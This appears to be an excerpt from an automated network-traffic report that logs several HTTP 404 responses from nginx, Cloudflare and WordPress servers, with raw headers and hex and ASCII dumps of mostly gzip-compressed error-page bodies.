Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49GSMFidGQGXH4M8N6AJ8rh8AgMko1h3umVhTjVzkny7t5qkc7n4P9quHVHwqy27DqNpo38M4YNkVJnoUsT2bj9AscfpLZKwW3ZX6gHuNT61j%2BNNsrYTHj1cv2lL8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d0d54ab2b05431f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:01 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 11 Oct 2024 08:03:02 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s\|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l\|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=2&~\'1/aQ3kVi1I-B4Ds
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:04 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 11 Oct 2024 08:03:05 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 24 ea e2 d8 ad ed 5c 37 76 e2 c6 4e f6 d9 6d f6 f8 40 24 24 21 a6 48 2e 48 5a 56 dc fc f7 f7 0c 40 12 20 45 5d 2c db fb b4 bb 6d 12 11 18 cc 0c 06 83 01 30 18 00 2f fe f2 f2 e3 f1 c5 2f 67 af d0 38 99 f8 07 4f 5f c0 3f c8 a3 6c 5f f3 13 a6 21 1f 07 a3 7d 8d 04 fa e7 73 0d 45 8c 0c e9 cd be 16 8e fa 68 9c 24 51 dc df dd 0d 47 51 73 42 76 83 f8 99 06 a5 09 f6 0e 9e 3e 79 31 21 09 46 ee 18 b3 98 24 fb da e7 8b d7 7a 57 43 bb 45 4e 80 27 64 5f bb a6 64 1a 85 2c d1 90 1b 06 09 09 92 7d 6d 4a bd 64 bc ef 91 6b ea 12 9d 7f 34 10 0d 68 42 b1 af c7 2e f6 c9 be c9 f1 3c 7d f2 e4 c5 5f 74 1d 1d fa 3e a2 01 fa 18 10 74 fe ea 23 6a 35 3b 4d 03 e9 08 d3 30 26 61 d3 0d 27 48 d7 0f fe 1f 40 27 34 f1 c9 c1 8b 5d f1 2f a4 28 9c b0 70 10 26 b1 c2 47 10 d2 c0 23 37 82 e7 12 e8 88 04 84 e1 24 64 0a 74 85 8b ed c3 77 1f cf 5f 7d dc 11 ec e4 38 62 97 d1 28 41 c9 2c 22 fb 1a 8e 22 9f ba 38 a1 61 b0 eb 7b 7f fb 16 87 81 86 5c 1f c7 f1 be 26 98 d7 63 77 4c 26 58 83 b2 4f 6e b5 7f 70 62 37 89 d6 d7 84 e4 bf ee 7e dd 15 20 cd 90 8d b4 86 f6 8f 11 c3 d1 58 eb ff eb 56 fb 07 10 d1 fa da 11 23 d8 73 59 3a 19 9c d0 38 01 18 ea 95 10 4c 66 8c 7a 64 94 ce 9a 01 49 be ee 5e 8d 66 de d7 dd 67 83 a2 98 2f 8a d1 84 4c 00 c3 2b 9f 4c 48 90 94 68 40 fa bb 84 4c 56 63 7f e6 4b d0 28 8c 29 54 5e eb 9b 0d 0d 04 ab f5 b5 b7 e1 84 64 c4 96 a1 d1 1a 5a 40 6e 04 a2 d5 75 29 68 fe 68 6c c2 73 Data Ascii: 459f}kw?e^$\7vNm@$$!H.HZV@ E],m0//g8O_?l_!}sEh$QGQsBv>y1!F$zWCEN'd_d,}mJdk4hB.<}_t>t#j5;M0&a'H@'4]/(p&G#7$dtw_}8b(A,""8a{\&cwL&XOnpb7~ XV#sY:8LfzdI^fg/L+LHh@LVcK()T^dZ@nu)hhls
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:07 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 11 Oct 2024 08:03:07 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 44 dd 1c bb b5 9d eb c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a 9b ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 c5 5f 5e 7e 3c be f8 e5 ec 15 1a 27 13 ff e0 e9 0b f8 07 79 94 ed 6b 7e c2 34 e4 e3 60 b4 af 91 40 ff 7c ae a1 88 91 21 bd d9 d7 c2 51 1f 8d 93 24 8a fb bb bb e1 28 6a 4e c8 6e 10 3f d3 a0 34 c1 de c1 d3 27 2f 26 24 c1 c8 1d 63 16 93 64 5f fb 7c f1 5a ef 6a 68 b7 c8 09 f0 84 ec 6b d7 94 4c a3 90 25 1a 72 c3 20 21 41 b2 af 4d a9 97 8c f7 3d 72 4d 5d a2 f3 8f 06 a2 01 4d 28 f6 f5 d8 c5 3e d9 37 39 9e a7 4f 9e bc f8 8b ae a3 43 df 47 34 40 1f 03 82 ce 5f 7d 44 ad 66 a7 69 20 1d 61 1a c6 24 6c ba e1 04 e9 fa c1 ff 03 e8 84 26 3e 39 78 b1 2b fe 85 14 85 13 16 0e c2 24 56 f8 08 42 1a 78 e4 46 f0 5c 02 1d 91 80 30 9c 84 4c 81 ae 70 b1 7d f8 ee e3 f9 ab 8f 3b 82 9d 1c 47 ec 32 1a 25 28 99 45 64 5f c3 51 e4 53 17 27 34 0c 76 7d ef 6f df e2 30 d0 90 eb e3 38 de d7 04 f3 7a ec 8e c9 04 6b 50 f6 c9 ad f6 0f 4e ec 26 d1 fa 9a 90 fc d7 dd af bb 02 a4 19 b2 91 d6 d0 fe 31 62 38 1a 6b fd 7f dd 6a ff 00 22 5a 5f 3b 62 04 7b 2e 4b 27 83 13 1a 27 00 43 bd 12 82 c9 8c 51 8f 8c d2 59 33 20 c9 d7 dd ab d1 cc fb ba fb 6c 50 14 f3 45 31 9a 90 09 60 78 e5 93 09 09 92 12 0d 48 7f 97 90 c9 6a ec cf 7c 09 1a 85 31 85 ca 6b 7d b3 a1 81 60 b5 be f6 36 9c 90 8c d8 32 34 5a 43 0b c8 8d 40 b4 ba 2e 05 cd 1f 8d 4d 78 ae Data Ascii: 459f}kw?e^DN>$IHe{vM"`0_^~<'yk~4`@\|!Q$(jNn?4'/&$cd_\|ZjhkL%r !AM=rM]M(>79OCG4@_}Dfi a$l&>9x+$VBxF\0Lp};G2%(Ed_QS'4v}o08zkPN&1b8kj"Z_;b{.K''CQY3 lPE1`xHj\|1k}`624ZC@.Mx
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:04:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:04:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:04:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:05:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 